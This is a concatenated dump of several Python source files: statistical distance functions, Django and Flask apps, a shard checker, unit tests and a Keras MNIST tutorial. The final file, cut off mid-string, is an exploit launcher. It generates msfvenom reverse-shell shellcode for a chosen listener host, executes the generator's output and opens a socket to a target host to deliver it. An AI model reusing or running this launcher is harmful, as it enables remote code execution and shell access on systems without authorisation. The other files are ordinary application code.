\"\"\"\n #TINY = 1.0e-20\n # ones for non-masked places at x,y and w\n x = MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n mask = MA.logical_or(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)), MA.getmaskarray(w))\n # set mask to w that is equal to the mask from x, y and w\n w = MA.masked_array(w, mask=mask)\n n_w_mean = MA.add.reduce(w) # n * mean(w)\n x_w = x*w # x * w\n y_w = y*w # y * w\n x_wmean = MA.divide(MA.add.reduce(x_w), n_w_mean) # weighted_mean(x)\n y_wmean = MA.divide(MA.add.reduce(y_w), n_w_mean) # weighted_mean(x) \n r_num = MA.add.reduce(x*y*w) - n_w_mean*x_wmean*y_wmean\n r_den = MA.sqrt((MA.add.reduce(x_w*x) - n_w_mean*x_wmean**2) * (MA.add.reduce(y_w*y) - n_w_mean*y_wmean**2))\n return 1 - MA.divide(r_num, r_den)\n\n\ndef distSpearman(x,y):\n \"\"\"distance corresponding to 1 - spearman's correlation coefficient for arrays x,y\n returns distance: 1 - spearman_r\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n cond = MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)))\n return 1 - statc.spearmanr(MA.compress(cond,x).tolist(), MA.compress(cond,y).tolist())[0]\n\ndef distSpearmanW(x,y,w):\n \"\"\"weighted distance corresponding to 1 - spearman's correlation coefficient for arrays x,y and weights w\n returns distance: 1 - spearman_r\n \"\"\"\n distSpearFunc = _distSpearmanW_NU\n for var in (x,y,w):\n if type(var) == MA.array and MA.count(var) != Numeric.multiply.reduce(var.shape):\n distSpearFunc = _distSpearmanW_MA\n break\n return distSpearFunc(x,y,w)\n\n\ndef _distSpearmanW_NU(x,y,w):\n \"\"\"x,y,w must be Numeric\n \"\"\"\n x = Numeric.asarray(x)\n y = Numeric.asarray(y)\n w = Numeric.asarray(w)\n assert Numeric.rank(x) == Numeric.rank(y) == Numeric.rank(w) == 1\n rankx = Numeric.array(statc.rankdata(x.tolist()))\n ranky = Numeric.array(statc.rankdata(y.tolist()))\n return distPearsonW(rankx,ranky,w)\n\n\ndef _distSpearmanW_MA(x,y,w):\n \"\"\"if any of x,y,w is a MA array containing masked values\n \"\"\"\n x = 
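Each metric above normalises by the count (or weight sum) of positions where both inputs are unmasked, so a masked slot shrinks the denominator rather than contributing zero. A small worked example under that reading, written against the old numpy.oldnumeric.ma API the widget imports; it assumes distManhattan and distPearson from above are in scope (distPearson additionally needs Orange's statc module).

import numpy.oldnumeric.ma as MA

x = MA.masked_array([1.0, 2.0, 3.0, 4.0], mask=[0, 0, 0, 1])  # last slot missing
y = MA.masked_array([1.0, 4.0, 2.0, 9.0], mask=[0, 0, 0, 0])

# Only the three jointly unmasked slots count: (0 + 2 + 1) / 3 = 1.0
print(distManhattan(x, y))

# 1 - Pearson r computed over the unmasked pairs (1,1), (2,4), (3,2)
print(distPearson(x, y))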
MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n cond = MA.logical_not(MA.logical_or(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)), MA.getmaskarray(w))) \n # with MA use compress before tolist() !\n rankx = Numeric.array(statc.rankdata(MA.compress(cond, x).tolist()))\n ranky = Numeric.array(statc.rankdata(MA.compress(cond, y).tolist()))\n return distPearsonW(rankx,ranky,MA.compress(cond,w))\n\n###########################################################################\n# testing\n###########################################################################\n\nif __name__==\"__main__\":\n import OWDataFiles, orngSignalManager\n signalManager = orngSignalManager.SignalManager(0)\n a=QApplication(sys.argv)\n ow=OWDataDistance(signalManager = signalManager)\n signalManager.addWidget(ow)\n a.setMainWidget(ow)\n ow.show()\n ds = OWDataFiles.OWDataFiles(signalManager = signalManager)\n signalManager.addWidget(ds)\n ds.loadData(\"potato.sub100\")\n signalManager.setFreeze(1)\n signalManager.addLink(ds, ow, 'Structured Data', 'Structured Data', 1)\n signalManager.setFreeze(0)\n a.exec_loop()\n ow.saveSettings()\n","sub_path":"widgets/prototypes/OWDataDistance.py","file_name":"OWDataDistance.py","file_ext":"py","file_size_in_byte":11512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97685187","text":"from django.urls import path\nfrom selection.views import show_floors, show_floors_details, show_all_offices, show_offices_details, show_zones, show_zones_details_by_floor\n\napp_name = 'selection'\n\nurlpatterns = [\n path('floors', show_floors, name='all_floors'),\n path('floors//', show_floors_details, name='floor_details'),\n path('offices', show_all_offices, name='all_offices'),\n path('offices//', show_offices_details, name='office_details'),\n path('zones', show_zones, name='all_zones'),\n path('zones//', show_zones_details_by_floor, name='zones_by_floor'),\n]\n","sub_path":"selection/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"123436359","text":"from flask import Flask, render_template, request, redirect, flash, make_response, session\nimport random\napp= Flask(__name__)\napp.secret_key=\"SECRET\"\n\n@app.route('/')\ndef index():\n if 'message' not in session:\n session['message']=\"\"\n if 'count' not in session:\n session['count']=5\n if 'res' not in session:\n session['res']=\"none\"\n if 'number' not in session:\n session['number'] = random.randint(1,101)\n return render_template('index.html', message = session['message'] , res=session['res'], cou=int(session['count']))\n\n@app.route('/submit', methods=['post'])\ndef guess():\n if int(request.form['guess'])>session['number'] and session['count']>0:\n session['message']='Too high'\n session['res']=\"red\"\n session['count']-=1\n elif int(request.form['guess'])0:\n session['message']='Too Low'\n session['res']=\"red\"\n session['count']-=1\n elif int(request.form['guess'])==session['number']:\n session['message']= \"congrats\"\n session['res']=\"green\"\n else: \n session['message']=\"out of guesses\"\n return redirect(\"/\")\n\n@app.route('/reset')\ndef reset():\n session['number']\n session.pop('number')\n session.pop('message')\n session['res']=\"none\"\n session['count'] =5\n return redirect(\"/\")\n\n# @app.route('/diff', methods=['post'])\n# def choose_dif():\n# dif = request.form()\n# 
if request.form['easy'] == 'easy':\n# session['count']=30\n# if request.form['med']=='med':\n# session['count']=15\n# if request.form['hard']=='hard':\n# session['count']=5\n# return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"number_game/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190929269","text":"import json\nfrom flask import Flask, flash, redirect, render_template, request, session, abort\nimport webbrowser,threading\n\ndef start_flask(link_recs):\n\n app = Flask(__name__)\n\n @app.route(\"/\")\n def index():\n return render_template(\n 'cold_start2.html',saved_recs=link_recs)\n\n\n threading.Timer(1.25, lambda: webbrowser.open('http://127.0.0.1:5084/')).start()\n app.run(port=5084)\n\nif __name__ == \"__main__\":\n\n saved_recs = json.load(open('link_recs.txt'))\n start_flask(saved_recs)\n","sub_path":"cold_start_flask.py","file_name":"cold_start_flask.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"581756905","text":"# Create a function that changes specific words into emoticons. \n# Given a sentence as a string, replace the words smile, grin, \n# sad and mad with their corresponding emoticons.\n\n# emotify(\"Make me smile\") ➞ \"Make me :D\"\n\n# emotify(\"Make me grin\") ➞ \"Make me :)\"\n\n# emotify(\"Make me sad\") ➞ \"Make me :(\"\n\ndef emotify(txt):\n\tface = {\n\t\t'smile': ':D', 'grin': ':)', 'sad': ':(', 'mad':':P'\n\t\t\n\t}\n\tfor f in face.keys():\n\t\tif f in txt:\n\t\t\ttxt = txt.replace(f, face[f])\n\treturn txt","sub_path":"emotifysentence.py","file_name":"emotifysentence.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280115941","text":"#!/usr/bin/env python\n\nimport argparse\nimport hashlib\nimport logging\nimport os\nimport sys\n\nimport yaml\n\nclass Checker(object):\n def __init__(self, config):\n self.config = config\n\n hasher = hashlib.new(self.config['hash'])\n self.hash_size = hasher.digest_size\n\n def _hash_path(self, partial):\n hasher = hashlib.new(self.config['hash'])\n hasher.update(partial)\n digest = hasher.hexdigest()\n\n logging.debug('hashed %s to %s', partial, digest)\n\n return digest\n\n def _path_in_shard_range(self, path, range_cfg):\n obj_hash = self._hash_path(path)\n hash_int = long(obj_hash, 16)\n\n ldelim = long(str(range_cfg[0]).ljust(self.hash_size * 2, str(range_cfg[0])[-1]), 16)\n if hash_int < ldelim:\n return False\n\n rdelim = long(str(range_cfg[1]).ljust(self.hash_size * 2, str(range_cfg[1])[-1]), 16)\n if hash_int > rdelim:\n return False\n\n return True\n\n def check(self):\n for shard_cfg in self.config['shards']:\n for i_root, i_dir, i_files in os.walk(shard_cfg['path']):\n rel_path = i_root[len(shard_cfg['path']):]\n\n # skip .git folders in the raws\n if rel_path == '/.git' or rel_path.startswith('/.git/'):\n continue\n\n for f in i_files:\n rel_with_file = rel_path + '/' + f\n if not self._path_in_shard_range(rel_with_file, shard_cfg['range']):\n loging.warning('file \"%s\" not in expected shard', rel_with_file)\n\ndef main():\n cli = argparse.ArgumentParser(description='Process some integers.')\n cli.add_argument('-c', '--config', dest='config', required=True, help='config file')\n cli_params = cli.parse_args()\n\n if not 
os.path.isfile(cli_params.config):\n raise Exception('invalid config file', cli_params.config)\n\n with open(cli_params.config, 'r') as fp:\n config = yaml.load(fp)\n\n log = logging.getLogger()\n log.setLevel(getattr(logging, config['log_level'].upper()))\n stderr_log_handler = logging.StreamHandler(sys.stderr)\n stderr_log_handler.setFormatter(logging.Formatter(datefmt='%Y-%m-%d %H:%M:%S', fmt='%(asctime)s [%(levelname)s] %(message)s'))\n log.addHandler(stderr_log_handler)\n\n obj = Checker(config)\n obj.check()\n\nif __name__ == '__main__':\n main()\n","sub_path":"check_balance.py","file_name":"check_balance.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32018197","text":"import json\n\nclass Entry:\n\n\tdef __init__(self, form, g):\n\t\tself.error = None\n\n\t\tself.author_id = g.user['id']\n\t\t# fetch basic forms\n\t\tself.name = form['name']\n\t\tself.descr = form['descr']\n\t\tself.version = form['version']\n\t\tself.site = form['site']\n\t\tself.tags = form['tags']\n\n\t\t# fetch contact\n\t\tself.contact = form['contact']\n\t\tif self.contact == 'Use my username':\n\t\t\tself.contact = g.user['username']\n\t\t\tself.contact_me = 1\n\t\telif self.contact == 'Other':\n\t\t\tself.contact = form['contact_other_txt']\n\t\t\tself.contact_me = 0\n\n\t\t# fetch dependency\n\t\ttry: \n\t\t\tself.dependency = form['dependency']\n\t\t\tself.dependency_other = 0\n\t\t\tif self.dependency == 'Yes':\n\t\t\t\t# self.depenency_other = 0\n\t\t\t\tself.dependency = form['dependency_yes_txt']\n\t\t\telif self.dependency == 'Other':\n\t\t\t\tself.dependency_other = 1\n\t\t\t\tself.dependency = form['dependency_other_txt']\n\t\texcept: self.error = 'Please select the dependencies your software has!'\n\n\t\t# fetch operating systems\n\t\tself.os = form.getlist('os')\n\t\tif \"Other\" in self.os:\n\t\t\tself.os_other = 1\n\t\t\tself.os.insert(0, form['os_other_txt'])\n\t\telse:\n\t\t\tself.os_other = 0\n\t\t# we use json.dumps because self.os is a list but we need a string\n\t\tself.os = json.dumps(self.os)\n\n\t\t# fee marking\n\t\tself.fee_academic = self.get_fee('fee_academic', form)\n\t\tself.fee_nonprofit = self.get_fee('fee_nonprofit', form)\n\t\tself.fee_govt = self.get_fee('fee_govt', form)\n\t\tself.fee_commercial = self.get_fee('fee_commercial', form)\n\n\tdef __getitem__(self, arg):\n\t\treturn getattr(self, arg)\n\n\t# returns 0 if there's no fee; else 1\n\tdef get_fee(self, name, form):\n\t\ttry: return 0 if form[name] == 'Free' else 1\n\t\texcept: return -1\n\n\t# returns any applicable errors\n\tdef get_error(self):\n\t\terror = None\n\t\tif self.error:\n\t\t\terror = self.error\n\t\telif not self.name:\n\t\t\terror = 'Please name your entry!'\n\t\telif not self.version:\n\t\t\terror = 'Please enter a version!'\n\t\telif not self.descr:\n\t\t\terror = 'Please provide a description of your software!'\n\t\telif len(self.descr) > 1024:\n\t\t\terror = 'Please provide a shorter description of your software!'\n\t\telif not self.tags:\n\t\t\terror = 'Please enter some key phrases to describe your software!'\n\t\telif len(self.tags.splitlines()) < 3:\n\t\t\terror = 'Please enter more phrases to describe your software!'\n\t\telif self.os == json.dumps([]):\n\t\t\terror = 'Please select the operating systems your software supports!'\n\t\telif not self.dependency:\n\t\t\terror = 'Please select the dependencies your software has!'\n\t\telif (self.fee_academic == -1 or self.fee_nonprofit == -1 
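The delimiters in a shard's range config are short hex prefixes: _path_in_shard_range pads each prefix to the full digest width by repeating its last character via ljust, then compares integers. A worked sketch of that padding rule, assuming md5 as the configured hash and using Python 3's int where the checker uses Python 2's long; the path is illustrative.

import hashlib

hash_size = hashlib.new('md5').digest_size  # 16 bytes -> 32 hex characters

def pad(prefix):
    """Repeat a short hex prefix's last character out to full digest width."""
    return int(str(prefix).ljust(hash_size * 2, str(prefix)[-1]), 16)

digest = int(hashlib.md5(b'/relative/path').hexdigest(), 16)
lo, hi = pad('8'), pad('b')  # shard range 0x888...8 through 0xbbb...b
print(lo <= digest <= hi)    # same inclusive test the checker performs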
or\n\t\t\tself.fee_govt == -1 or self.fee_commercial == -1):\n\t\t\terror = 'Please finish your fees section!'\n\t\t\n\t\treturn error\n\n\t# inserts this entry into the database\n\tdef insert(self, db):\n\t\tdb.execute(\n\t\t\t'INSERT INTO post'\n\t\t\t' (author_id, name, contact, contact_me, version, site, descr, tags,'\n\t\t\t' dependency, dependency_other, os, os_other, fee_academic, fee_nonprofit,'\n\t\t\t' fee_govt, fee_commercial)'\n\t\t\t' VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',\n\t\t\t(self.author_id, self.name, self.contact, self.contact_me, self.version, self.site, \n\t\t\tself.descr, self.tags, self.dependency, self.dependency_other, self.os, self.os_other,\n\t\t\tself.fee_academic, self.fee_nonprofit, self.fee_govt, self.fee_commercial)\n\t\t)\n\t\tdb.commit()\n\n\t# updates this entry in the database\n\tdef update(self, db, id, g):\n\t\t# we need to check if it's an admin editing, since\n\t\t# their username shouldn't overwrite the original one\n\t\tif g.user['admin'] == 1 and self.contact_me:\n\t\t\tcontact = db.execute(\n\t\t\t\t'SELECT contact FROM post WHERE id = ?',\n\t\t\t\t(id, )\n\t\t\t).fetchone()['contact']\n\t\telse:\n\t\t\tcontact = self.contact\n\n\t\tdb.execute(\n\t\t\t'UPDATE post SET'\n\t\t\t' name = ?, contact = ?, contact_me = ?, version = ?, site = ?, descr = ?, tags = ?,'\n\t\t\t' dependency = ?, dependency_other = ?, os = ?, os_other = ?, fee_academic = ?,'\n\t\t\t' fee_nonprofit = ?, fee_govt = ?, fee_commercial = ?'\n\t\t\t' WHERE id = ?',\n\t\t\t(self.name, contact, self.contact_me, self.version, self.site, self.descr, self.tags,\n\t\t\tself.dependency, self.dependency_other, self.os, self.os_other, self.fee_academic, \n\t\t\tself.fee_nonprofit, self.fee_govt, self.fee_commercial, id)\n\t\t)\n\t\tdb.commit()\n","sub_path":"flaskr/entrydata.py","file_name":"entrydata.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"267011766","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom mock import Mock\nfrom pyramid import httpexceptions\nfrom pyramid.testing import DummyRequest\nimport pytest\n\nfrom h.admin.views import admins as views\n\n\n@pytest.mark.usefixtures('routes')\nclass TestAdminsIndex(object):\n def test_when_no_admins(self):\n request = DummyRequest()\n\n result = views.admins_index(request)\n\n assert result[\"admin_users\"] == []\n\n @pytest.mark.usefixtures('users')\n def test_context_contains_admin_usernames(self):\n request = DummyRequest()\n\n result = views.admins_index(request)\n\n assert set(result[\"admin_users\"]) == set([\"agnos\", \"bojan\", \"cristof\"])\n\n\n@pytest.mark.usefixtures('users', 'routes')\nclass TestAdminsAddRemove(object):\n\n def test_add_makes_users_admins(self, users):\n request = DummyRequest(params={\"add\": \"eva\"})\n\n views.admins_add(request)\n\n assert users['eva'].admin\n\n def test_add_is_idempotent(self, users):\n request = DummyRequest(params={\"add\": \"agnos\"})\n\n views.admins_add(request)\n\n assert users['agnos'].admin\n\n def test_add_redirects_to_index(self):\n request = DummyRequest(params={\"add\": \"eva\"})\n\n result = views.admins_add(request)\n\n assert isinstance(result, httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n def test_add_redirects_to_index_when_user_not_found(self):\n request = DummyRequest(params={\"add\": \"florp\"})\n\n result = views.admins_add(request)\n\n assert isinstance(result, 
httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n def test_add_flashes_when_user_not_found(self):\n request = DummyRequest(params={\"add\": \"florp\"})\n request.session.flash = Mock()\n\n views.admins_add(request)\n\n assert request.session.flash.call_count == 1\n\n def test_remove_makes_users_not_admins(self, users):\n request = DummyRequest(params={\"remove\": \"cristof\"})\n\n views.admins_remove(request)\n\n assert not users['cristof'].admin\n\n def test_remove_is_idempotent(self, users):\n request = DummyRequest(params={\"remove\": \"eva\"})\n\n views.admins_remove(request)\n\n assert not users['eva'].admin\n\n def test_remove_will_not_remove_last_admin(self, users):\n views.admins_remove(DummyRequest(params={\"remove\": \"cristof\"}))\n views.admins_remove(DummyRequest(params={\"remove\": \"bojan\"}))\n views.admins_remove(DummyRequest(params={\"remove\": \"agnos\"}))\n\n assert users['agnos'].admin\n\n def test_remove_redirects_to_index(self):\n request = DummyRequest(params={\"remove\": \"agnos\"})\n\n result = views.admins_remove(request)\n\n assert isinstance(result, httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n def test_remove_redirects_to_index_when_user_not_found(self):\n request = DummyRequest(params={\"remove\": \"florp\"})\n\n result = views.admins_remove(request)\n\n assert isinstance(result, httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n\n@pytest.fixture\ndef users(db_session):\n from h import models\n\n admins = ['agnos', 'bojan', 'cristof']\n nonadmins = ['david', 'eva', 'flora']\n\n users = {}\n\n for admin in admins:\n users[admin] = models.User(username=admin,\n email=admin + '@example.com',\n password='secret',\n admin=True)\n for nonadmin in nonadmins:\n users[nonadmin] = models.User(username=nonadmin,\n email=nonadmin + '@example.com',\n password='secret')\n\n db_session.add_all(list(users.values()))\n db_session.flush()\n\n return users\n\n\n@pytest.fixture\ndef routes(config):\n config.add_route('admin_admins', '/adm/admins')\n","sub_path":"tests/h/admin/views/admins_test.py","file_name":"admins_test.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"514249735","text":"#Coder: Tran Duy Thanh\r\n#Email: thanhtd@uel.edu.vn\r\n#Phone: 0987773061\r\n#Blog for self-study: https://duythanhcse.wordpress.com\r\n#Facebook for solving coding problem: https://www.facebook.com/groups/communityuni\r\n#Description:\r\n #These codes I improved from Exercise 36\r\n # Number recognition program using Keras (deep learning)\r\n # In this practice, I use and update some functions:\r\n # 1. Using TensorFlow backend\r\n # 2. Using MNIST dataset\r\n # 3. Build model using Keras\r\n # 4. Write function to convert physical image to array vector\r\n # 5. Run model and predict function to regcognize the number\r\n # 6. Use pyplot to show processing and predict result\r\n # 7.Test some cases to recognize number\r\n#Step 1. Import some necessarily library\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.utils import np_utils\r\nfrom keras.datasets import mnist\r\nimport cv2\r\n\r\n# Step 2. 
Load MNIST Dataset\r\n#Load data from the MNIST dataset, including 60,000 training sets and 10,000 test sets.\r\n# Then divide the training set to 2 parts: 50,000 for training set and 10,000 data for validation set.\r\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\r\nX_val, y_val = X_train[50000:60000,:], y_train[50000:60000]\r\nX_train, y_train = X_train[:50000,:], y_train[:50000]\r\n#print to see data\r\nprint(X_train.shape)\r\n\r\n# Step 3. Reshape the data to the correct size required by keras\r\n# Input data for the Convolutional Neural Network model is a 4-dimensional tensor (N, W, H, D),\r\n#in this MNIST dataset is a grayscale image so W = H = 28, D = 1,\r\n#N is the number of images for each training session.\r\n#Because the image data above has the size of (N, 28, 28) ie (N, W, H)\r\n#so need to reshape to N 28 28 * 1 size to match the size required by keras.\r\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1)\r\nX_val = X_val.reshape(X_val.shape[0], 28, 28, 1)\r\nX_test = X_test.reshape(X_test.shape[0], 28, 28, 1)\r\n\r\n# Step 4. One hot encoding label (Y)\r\n#This step converts the one-hot encoding label Y of the example\r\n#image number 5 into a vector [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\r\nY_train = np_utils.to_categorical(y_train, 10)\r\nY_val = np_utils.to_categorical(y_val, 10)\r\nY_test = np_utils.to_categorical(y_test, 10)\r\n#print result to see\r\nprint('Original data y', y_train[0])\r\nprint('y after one-hot encoding ',Y_train[0])\r\n\r\n# Step 5. Model definition\r\n#1.Model = Sequential() to tell keras that we will layer layers on top of each other to create models.\r\n# Example input -> CONV -> POOL -> CONV -> POOL -> FLATTEN -> FC -> OUTPUT\r\n#2.In the first layer, We need to specify the input_shape of the image, input_shape = (W, H, D),\r\n# we use grayscale image size (28.28) so input_shape = (28, 28, 1)\r\n#3.When adding a Convolutional Layer, we need to specify the parameters: K (number of layers),\r\n# kernel size (W, H), activation function to use.\r\n# structure: model.add(Conv2D(K, (W, H), activation='function_name_activation'))\r\n#4.When adding a Maxpooling Layer, specify the size of the kernel, model.add(MaxPooling2D(pool_size=(W, H)))\r\n#5.Flatten step from tensor to vector just add flatten layer.\r\n#6.To add Fully Connected Layer (FC) need to specify the number of nodes in the layer and the activation\r\n# function used in the layer, structure: model.add(Dense(number_node_activation='activation_function_name'))\r\n\r\nmodel = Sequential()\r\n\r\n# Add Convolutional layer with 32 kernels, kernel size 3*3\r\n# use sigmoid function as activation and specify input_shape for first layer\r\nmodel.add(Conv2D(32, (3, 3), activation='sigmoid', input_shape=(28, 28, 1)))\r\n\r\n# Add Convolutional layer\r\nmodel.add(Conv2D(32, (3, 3), activation='sigmoid'))\r\n\r\n# Add Max pooling layer\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n# Flatten layer convert from tensor to vector\r\nmodel.add(Flatten())\r\n\r\n# Add Fully Connected layer with 128 nodes and use sigmoid . function\r\nmodel.add(Dense(128, activation='sigmoid'))\r\n\r\n# Output layer with 10 nodes and use softmax function to convert to probability.\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\n# Step 6. Compile model, specify which loss_function to use, method\r\n# is used to optimize the loss function.\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\n# Step 7. 
Train model with data\r\nH = model.fit(X_train, Y_train, validation_data=(X_val, Y_val),\r\n batch_size=32, epochs=10, verbose=1)\r\n\r\n# Step 8. Plot loss, accuracy of training set and validation set\r\nfig = plt.figure()\r\nnumOfEpoch = 10\r\nplt.plot(np.arange(0, numOfEpoch), H.history['loss'], label='training loss')\r\nplt.plot(np.arange(0, numOfEpoch), H.history['val_loss'], label='validation loss')\r\nplt.plot(np.arange(0, numOfEpoch), H.history['accuracy'], label='accuracy')\r\nplt.plot(np.arange(0, numOfEpoch), H.history['val_accuracy'], label='validation accuracy')\r\nplt.title('Accuracy and Loss')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('Loss|Accuracy')\r\nplt.legend()\r\n\r\n# Step 9. Model evaluation with test set data\r\nscore = model.evaluate(X_test, Y_test, verbose=0)\r\n#print result to see\r\nprint(score)\r\n#[0.033531852066516876, 0.9901999831199646]\r\n# We will use the evaluation result of the mode with the test set to make the final result of the model.\r\n# That is, our model predicts digits with 99% accuracy with the MNIST dataset.\r\n# That is, predicting about 100 images will be wrong by 1 image.\r\n\r\n# Step 10. Number prediction\r\n# create conv_image_to_data function to convert image file to array 28x28\r\ndef conv_image_to_data(filename):\r\n img_array = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\r\n\r\n img_pil = Image.fromarray(img_array)\r\n img_28x28 = np.array(img_pil.resize((28, 28), Image.ANTIALIAS))\r\n\r\n img_array = (img_28x28.flatten())\r\n\r\n img_array = img_array.reshape(-1,1).T\r\n\r\n return img_array\r\n#call conv_image_to_data to test image digit-5.png\r\ndata=conv_image_to_data(\"data_exercise37\\digit-1.png\")\r\n#show image into chart\r\nplt.imshow(data.reshape(28,28), cmap='Blues')\r\n#call predict function\r\ny_predict = model.predict(data.reshape(1,28,28,1))\r\n#get number recognition and show into title of Chart\r\nplt.title('Predict number is '+str(np.argmax(y_predict)))\r\nplt.show()","sub_path":"Exercise37.py","file_name":"Exercise37.py","file_ext":"py","file_size_in_byte":6359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88126462","text":"#!/usr/bin/env python\n\nimport socket\nimport struct\nimport multiprocessing\nimport sys\nimport argparse\nimport subprocess, os\nimport time\nimport threading\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-T', '--target', required=True)\n\tparser.add_argument('-Pt', '--port', required=False)\n\tparser.add_argument('-Pd', '--payload', required=True)\n\tparser.add_argument('-LH', '--listen-host', required=True)\n\tparser.add_argument('-LP', '--listen-port', required=False)\n\tparser.add_argument('-NS', '--no-shell', required=False, action=\"store_true\")\n\tparser.add_argument('-QS', '--quiet-shellcode', required=False, action=\"store_true\")\n\targs = vars(parser.parse_args())\n\n\thost = args['target']\n\tpayload = args['payload']\n\tlhost = args['listen_host']\n\t\n\tif args['no_shell']:\n\t\trev_shell = \"print(\\\"Executing...\\\")\"\n\telse:\n\t\trev_shell = \"t = threading.Thread(target=netcat).start();\" \n\t\trev_shell += \"sys.stdout.write(\\\"[Shell Listener Started]\\\")\"\n\t\n\tif not args['port']:\n\t\tport = 9999\n\telse:\n\t\tport = int(args['port'])\n\t\n\tif not args['listen_port']:\n\t\tlport = 4444\n\telse:\n\t\tlport = int(args['listen_port'])\n\nclass sock(object):\n\tdef tcp(self):\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\treturn s\n\tdef 
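Exercise37 retrains its CNN from scratch on every run even though it already imports load_model. A small follow-on sketch that persists the trained model so later predictions skip the ten epochs; the file name is a placeholder, and conv_image_to_data is the helper defined in the script.

from keras.models import load_model
import numpy as np

model.save('mnist_cnn.h5')  # stores architecture, weights and optimizer state

# Later, reload instead of retraining (conv_image_to_data assumed in scope):
model = load_model('mnist_cnn.h5')
data = conv_image_to_data("data_exercise37\digit-1.png")
y_predict = model.predict(data.reshape(1, 28, 28, 1))
print('Predict number is', int(np.argmax(y_predict)))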
udp(self):\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\treturn s\n\n\ndef configure():\n\ttry:\n\t\tnew_sockfd = sock().tcp()\n\t\treturn new_sockfd\n\texcept Exception as e:\n\t\treturn e\ndef connect(sock,host,port):\n\ttry:\n\t\tsock.connect((host,int(port)))\n\t\treturn True\n\texcept Exception as e:\n\t\treturn e\ndef send(sockfd, data):\n\ttry:\n\t\tsockfd.send(data)\n\t\treturn True\n\texcept:\n\t\treturn False\n\n\ntry:\n\tsys.stdout.write(\"\\n\\nCONFIGURING SOCKET ... \")\n\tsockfd = configure()\n\tif sockfd:\n\t\tsys.stdout.write(\"DONE\\n\")\n\telse:\n\t\tsys.stdout.write(\"FAILED\\n\")\n\t\tprint(sockfd)\nexcept Exception as err:\n\tsys.stdout.write(\"FAILED\\n{}\".format(str(err)))\n\tsys.exit()\n\n\ntry:\n\tsys.stdout.write(\"CONNECTING SOCKET ... \")\n\tif connect(sockfd,host,port) == True:\n\t\tsys.stdout.write(\"DONE\\n\")\n\telse:\n\t\tsys.stdout.write(\"FAILED\\n\")\n\t\tsys.exit()\nexcept Exception as err:\n\tsys.stdout.write(\"FAILED\\n{}\".format(str(err)))\n\tsys.exit()\n\nprint(\"\\x0a\\nGENERATING SHELLCODE:\\n- %s\\n- %s : %d\\n- bdchrs \\\\x00\\\\x0a\\\\x0d\"%(payload,lhost,lport))\nlipudp = sock().udp()\nconnect(lipudp,'8.8.8.8',53)\nlocalip = lipudp.getsockname()[0].__str__()\nlipudp.close()\ncommand = r\"msfvenom -p %s LHOST=%s LPORT=%d -f python R -v buf -b '\\x00\\x0a\\x0d'\" \\\n\t\t%(payload.__str__(), lhost, lport)\ncmd = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\nshc = cmd.stdout.read()\nexec(shc)\nsys.stdout.write(\"\\n\\nSTDOUT Shellcode Output:\\n\")\ntime.sleep(2)\nif not args['quiet_shellcode']:\n\tprint(buf.replace(\"\\n\", \"\").replace(\"\\x0a\", \"\").__repr__())\nelse:\n\tsys.stdout.write(\"- \"+buf[:2].__repr__().replace(\"'\", \"\")); sys.stdout.write(\"...\"); sys.stdout.write(buf[len(buf)-3:len(buf)].__repr__().replace(\"'\", \"\"))\ntime.sleep(2)\nsys.stdout.write(\"\\n\\n\\nCONSTRUCTING 